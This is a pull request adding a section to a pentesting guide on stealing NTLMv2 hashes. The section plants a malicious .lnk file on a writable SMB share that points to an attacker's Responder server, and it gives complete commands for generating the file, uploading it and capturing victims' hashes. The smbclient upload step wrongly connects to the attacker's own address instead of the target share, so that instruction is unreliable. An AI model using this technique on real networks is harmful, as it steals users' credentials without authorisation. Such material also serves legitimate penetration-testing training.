### PR TITLE
Added in NTLMv2 Hashgrab Technqiue

### DIFF
--- a/network-services-pentesting/pentesting-smb.md
+++ b/network-services-pentesting/pentesting-smb.md
@@ -327,6 +327,33 @@ sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a87
 sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
 ```
 
+### NTLMv2 .lnk Files
+
+If you have write access to an SMB share, you can try place a .lnk file that points to your Responder server. Once a user browses to the folder or clicks on the .lnk file a NTLMv2 hash will be sent to said server.
+
+You can download the Hashgrab tool from Github in order to make the malicious .lnk file.
+
+```bash
+git clone https://github.com/xct/hashgrab.git
+cd hashgrab
+python3 hashgrab <Attacker IP address> link
+```
+
+Once downloaded, simply upload the "@link.lnk" file
+
+```bash
+smbclient -U <Username> //<Attacker IP address>/<Share name>
+put @link.lnk
+```
+
+Once uploaded, you can start a Responder server and wait for a hash to arrive.
+
+```
+git clone https://github.com/lgandx/Responder.git
+cd Responder
+python3 ./Responder.py -I <Network interface> -PdvwD
+```
+
 ### Local users
 
 Enumerate **local** users with SID brute-forcing:


### PR DESCRIPTION
Hi @carlospolop,

I added in an NTLMv2 hash retrieval technique via .lnk files. Whenever a Windows victim browses to the folder with a malicious .lnk file, it will send their hash to the attacker which will retrieve the hash via Responder.

This technique was taught on a recent Proving Grounds Practice machine.

Thanks.